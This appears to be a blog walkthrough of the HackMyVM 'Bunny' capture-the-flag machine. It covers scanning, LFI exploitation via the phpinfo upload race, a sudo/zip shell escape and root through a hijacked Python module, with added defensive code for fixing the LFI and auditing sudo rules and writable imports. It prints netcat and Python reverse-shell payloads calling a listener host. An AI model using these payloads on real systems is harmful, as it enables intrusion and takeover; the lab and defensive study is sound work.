Windy's little blog

Odds and ends from everyday life, and I like CTF.

HackMyVm Bunny Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bunny


Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100 -oN ports.log
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Scan dirs.

 ~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
 ===============================================================
 /upload.php           (Status: 200) [Size: 27305]
 /password.txt         (Status: 200) [Size: 537]
 /index.php            (Status: 200) [Size: 25]
 /config.php           (Status: 200) [Size: 24691]
 /phpinfo.php          (Status: 200) [Size: 95622]


After checking all the files, nothing interesting turned up. Next, fuzz index.php to see whether it accepts any parameters.

 ~ wfuzz -u 'http://192.168.56.100/index.php?FUZZ=/etc/passwd' --hh 25  -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000013357:   200        31 L     43 W       1508 Ch     "page"


Fuzzing local file paths through the `page` parameter confirms the LFI, but none of the readable files turned up anything useful.

 ~ wfuzz -u 'http://192.168.56.100/index.php?page=FUZZ' --hh 25 -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000001:   200        31 L     43 W       1508 Ch     "/etc/passwd"
 000000005:   200        231 L    1117 W     7249 Ch     "/etc/apache2/apache2.conf"
 000000004:   200        17 L     42 W       426 Ch      "/etc/anacrontab"
 000000015:   200        26 L     192 W      1067 Ch     "/etc/crontab"
 ...
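The root cause here is that whatever the request puts in `page` is handed straight to an include, which is why absolute paths like /etc/passwd (and, later, /tmp/g) are served. The following is an added example, not code from the target or from this walkthrough, and it is written in Python rather than the target's PHP: it reproduces the include logic in a constructed temporary web root (the `PAGES_DIR`, page names and `ALLOWED_PAGES` map are all made up here) and puts the unsafe resolver next to two hardened forms, path confinement alone and an explicit allowlist.

```python
"""The index.php?page= include on Bunny, reproduced as resolver logic.

Added example in Python (the target's app is PHP; this mirrors the include
logic, not its code).  The web root, page files and allowlist below are
constructed here purely for illustration."""
import os
import tempfile
from typing import Optional

# Constructed web root holding two legitimate page fragments.
WEBROOT = tempfile.mkdtemp(prefix="bunny-lfi-demo-")
PAGES_DIR = os.path.join(WEBROOT, "pages")
os.makedirs(PAGES_DIR)
for _name in ("home", "about"):
    with open(os.path.join(PAGES_DIR, _name + ".php"), "w") as _fh:
        _fh.write(f"<?php echo '{_name}'; ?>\n")


def unsafe_resolve(page: str) -> str:
    """Equivalent of include($_GET['page']): the request string is the path.
    This is why ?page=/etc/passwd and later ?page=/tmp/g were served."""
    return page


def confine_under_pages(page: str) -> Optional[str]:
    """Path confinement alone: build the candidate, canonicalise it and
    refuse anything that does not live under PAGES_DIR.  Absolute paths
    (/tmp/g) and traversal (../../etc/passwd) both end up outside and are
    rejected; an embedded NUL byte is rejected as well."""
    try:
        candidate = os.path.realpath(os.path.join(PAGES_DIR, page + ".php"))
    except ValueError:  # embedded null byte
        return None
    base = os.path.realpath(PAGES_DIR) + os.sep
    if not candidate.startswith(base) or not os.path.isfile(candidate):
        return None
    return candidate


# Constructed allowlist: request name -> file under PAGES_DIR.
ALLOWED_PAGES = {"home": "home.php", "about": "about.php"}


def safe_resolve(page: str) -> Optional[str]:
    """Preferred fix: an explicit allowlist, with confinement kept as a
    second check so a later edit to the map cannot widen it silently."""
    filename = ALLOWED_PAGES.get(page)
    if filename is None:
        return None
    return confine_under_pages(filename[: -len(".php")])


if __name__ == "__main__":
    for req in ("home", "/etc/passwd", "/tmp/g", "../../../../etc/passwd"):
        print(f"{req!r:28} unsafe={unsafe_resolve(req)!r:26} "
              f"safe={safe_resolve(req)!r}")
```

Confinement on its own already stops every request this walkthrough relies on, but the allowlist is the better primary control because it does not depend on how the filesystem resolves a given string.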


Now we have a PHP file with an LFI, plus a phpinfo page showing that file_uploads is on. That combination is the well-known LFI + phpinfo() trick.

Download the PoC from https://raw.githubusercontent.com/vulhub/vulhub/master/php/inclusion/exp.py and modify the payload.

 PAYLOAD="""%s\r
 <?php file_put_contents('/tmp/g', '<?php system("nc 192.168.56.150 1234 -e /bin/bash"); ?>')?>\r""" % TAG


Run the PoC; the shell has now been written to /tmp/g.

 ~ (p2) python exp.py 192.168.56.100 80
 LFI With PHPInfo()
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Getting initial offset... found [tmp_name] at 137073
 Spawning worker pool (10)...
   51 /  1000
 Got it! Shell created in /tmp/g
 
 Woot!  \m/
 Shuttin' down...


Listen on port 1234 and include /tmp/g through the LFI.

 ~ curl 'http://192.168.56.100/index.php?page=/tmp/g'
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234        
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49970.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)


Next, we find the user chris and a file named magic that www-data may run through sudo.

 www-data@bunny:/home/chris/lab$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on bunny:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User www-data may run the following commands on bunny:
     (chris) NOPASSWD: /bin/bash /home/chris/lab/magic *
 www-data@bunny:/home/chris/lab$ cat magic
 cat magic
 #/bin/bash
 $1 $2 $3 -T -TT 'sh #'
 www-data@bunny:/home/chris/lab$


Checking the notes at https://gtfobins.github.io/gtfobins/zip/, we see that zip can spawn a shell using exactly the arguments the magic file appends.

 Shell
 
 It can be used to break out from restricted environments by spawning an interactive system shell.
 
     TF=$(mktemp -u)
     zip $TF /etc/hosts -T -TT 'sh #'
     rm $TF
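From the defender's side, the `sudo -l` output and the wrapper above are the whole story: the rule grants an interpreter rather than a fixed program, ends in a wildcard, and the wrapper turns its first positional parameter into the command word. The following is an added example, not part of the walkthrough or the target; the rule line and the script text are copied from the output above, while the finding codes, the `INTERPRETERS` set and the regular expressions are my own heuristics for auditing a single rule line (this is not a full sudoers parser).

```python
"""Flag the shape of sudo rule that let www-data get a shell as chris.

Added example; the rule and wrapper text are copied from the `sudo -l` and
`cat magic` output in the walkthrough.  The heuristics are mine and apply
to one rule line at a time (not a full sudoers parser)."""
import re
import shlex

SUDO_RULE = "(chris) NOPASSWD: /bin/bash /home/chris/lab/magic *"
MAGIC_SCRIPT = "#/bin/bash\n$1 $2 $3 -T -TT 'sh #'\n"

# Constructed list: programs whose first argument is a script or command
# string, so granting one via sudo grants whatever it is pointed at.
INTERPRETERS = {"/bin/bash", "/bin/sh", "/bin/dash", "/usr/bin/python3",
                "/usr/bin/python3.7", "/usr/bin/perl"}

# (runas) [TAG: ...] command and arguments
RULE_RE = re.compile(r"\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)")


def audit_sudo_rule(rule: str) -> list:
    """Return (code, message) findings for one `sudo -l` style rule line."""
    m = RULE_RE.match(rule.strip())
    if not m:
        raise ValueError(f"unrecognised rule: {rule!r}")
    findings = []
    tags = {t.rstrip(":") for t in m.group("tags").split()}
    argv = shlex.split(m.group("cmd"))
    if "NOPASSWD" in tags:
        findings.append(("NOPASSWD",
                         "no password required, so a web shell alone can use the rule"))
    if argv and argv[0] in INTERPRETERS:
        findings.append(("INTERPRETER_COMMAND",
                         f"{argv[0]} is an interpreter; the rule really grants the script it is handed"))
    if any("*" in a or "?" in a for a in argv[1:]):
        findings.append(("WILDCARD_ARG",
                         "a wildcard in the arguments matches any number of extra words, spaces included"))
    return findings


def audit_wrapper(script: str) -> list:
    """Findings for a shell wrapper run via sudo: positional parameters that
    are passed through unquoted, and especially one used as the command word."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        words = shlex.split(line)
        if words and re.fullmatch(r"\$(\d+|\{\d+\})", words[0]):
            findings.append(("CALLER_CHOOSES_COMMAND",
                             f"line {lineno}: command word is {words[0]}, so the caller picks the program"))
        if re.search(r'(?<!")\$(\d|@|\*|\{\d+\})', line):
            findings.append(("UNQUOTED_POSITIONAL",
                             f"line {lineno}: positional parameters expand unquoted and are word-split"))
    return findings


if __name__ == "__main__":
    for code, msg in audit_sudo_rule(SUDO_RULE) + audit_wrapper(MAGIC_SCRIPT):
        print(f"{code:24} {msg}")
```

A rule that names one fixed binary with fixed arguments, and a wrapper that quotes its parameters and never uses one as the command, produces no findings; that is the shape to rewrite towards when a rule like this one shows up in an audit.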


Escalate to user chris.

 www-data@bunny:/home/chris/lab$ sudo -u chris /bin/bash /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
 <h /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
   adding: etc/hosts (deflated 30%)
 $ id
 id
 uid=1000(chris) gid=1000(chris) groups=1000(chris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)


Create /home/chris/.ssh, upload id_rsa.pub as authorized_keys, chmod it to 600, and we can log in over SSH.

Search for writable files; /usr/lib/python3.7/random.py stands out.

 chris@bunny:~$ find / -writable -not -path "/proc*" 2>/dev/null
 /home/chris
 ...
 /usr/lib/python3.7/random.py
 /tmp
 ...


We also find /opt/pendu.py, which imports random and therefore loads that writable random.py.

 chris@bunny:~$ cd /opt
 chris@bunny:/opt$ ls -la
 total 12
 drwxr-x---  2 root chris 4096 juil. 31 10:25 .
 drwxr-xr-x 18 root root  4096 juil. 31 09:00 ..
 -rw-r--r--  1 root root  1993 juil. 31 10:14 pendu.py
 chris@bunny:/opt$ cat pendu.py
 import random                    
 ...


Use pspy to watch running processes: root executes /opt/pendu.py on a schedule.

 2021/08/17 06:53:01 CMD: UID=0    PID=1236   | /bin/sh -c /usr/bin/python3.7 /opt/pendu.py
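What makes this chain work is the combination of the three facts just shown: a script run as root, an import in that script, and a module file on the import path that a non-root user can write. The check below is an added example, not code from the walkthrough or the target; it builds a constructed copy of the layout in a temporary directory (an `opt/pendu.py` importing random, os and socket, and a stand-in stdlib directory where only random.py is group/world-writable, mode 666 here since the page only shows it as writable), then resolves each import the way the interpreter would and reports the ones that land on a writable file or a writable directory.

```python
"""Find imports of a privileged script that resolve to files other users can
modify.  Added example; the fixture (a script importing random, and a stdlib
directory whose random.py is world-writable) is constructed in a temp dir to
mirror what `find / -writable` showed on Bunny."""
import ast
import os
import stat
import tempfile
from typing import Optional


def imported_modules(source: str) -> set:
    """Top-level package names pulled in by `import x`, `import x.y` and
    `from x import y` (relative imports are skipped)."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names


def resolve_on_path(module: str, search_path: list) -> Optional[str]:
    """First file the interpreter would load for `module`, walking the path
    in order (a .py file or a package __init__.py)."""
    for directory in search_path:
        for candidate in (os.path.join(directory, module + ".py"),
                          os.path.join(directory, module, "__init__.py")):
            if os.path.isfile(candidate):
                return candidate
    return None


def writable_by_others(path: str) -> bool:
    """Group- or world-writable bit set (the owner is assumed to be root)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_script(script_path: str, search_path: list) -> dict:
    """Map each import that resolves to a group/world-writable file to that
    file.  Any hit means a non-root user can run code as whoever runs the
    script (root via cron, in the walkthrough)."""
    with open(script_path) as fh:
        source = fh.read()
    hits = {}
    for module in sorted(imported_modules(source)):
        target = resolve_on_path(module, search_path)
        if target is not None and writable_by_others(target):
            hits[module] = target
    return hits


def audit_search_path(search_path: list) -> list:
    """Directories on the path that others can write to: a writable entry lets
    a shadowing module be dropped in front of the real one, so it is a
    finding even when every existing file is fine."""
    return [d for d in search_path if os.path.isdir(d) and writable_by_others(d)]


def build_fixture() -> tuple:
    """Constructed layout: opt/pendu.py importing random, os and socket, and a
    lib dir where only random.py is world-writable (mode 666 is chosen here;
    the walkthrough only shows the file as writable)."""
    root = tempfile.mkdtemp(prefix="bunny-audit-")
    lib = os.path.join(root, "lib", "python3.7")
    opt = os.path.join(root, "opt")
    os.makedirs(lib)
    os.makedirs(opt)
    os.chmod(lib, 0o755)
    os.chmod(opt, 0o750)
    for name, mode in (("random", 0o666), ("os", 0o644), ("socket", 0o644)):
        path = os.path.join(lib, name + ".py")
        with open(path, "w") as fh:
            fh.write("# constructed stand-in for the real module\n")
        os.chmod(path, mode)
    script = os.path.join(opt, "pendu.py")
    with open(script, "w") as fh:
        fh.write("import random\nimport os\nfrom socket import gethostname\n")
    # The script's own directory comes first, as it does in sys.path.
    return script, [opt, lib]


if __name__ == "__main__":
    script, path = build_fixture()
    print("writable imports:", audit_script(script, path))
    print("writable path dirs:", audit_search_path(path))
```

On a real host you would pass the script's directory followed by the interpreter's `sys.path` (for example the output of `python3.7 -c 'import sys; print(sys.path)'`) instead of the constructed list; the fix for any hit is to restore the file's ownership and mode, since no stdlib file should be writable by anyone but root.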


Write a Python reverse shell into random.py and wait for the root shell.

 chris@bunny:~$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.150",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /usr/lib/python3.7/random.py 
 chris@bunny:~$
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49976.
 bash: impossible de régler le groupe de processus du terminal (1259): Ioctl() inapproprié pour un périphérique
 bash: pas de contrôle de tâche dans ce shell
 root@bunny:~# id;hostname;
 id;hostname;
 uid=0(root) gid=0(root) groupes=0(root)
 bunny
 root@bunny:~#
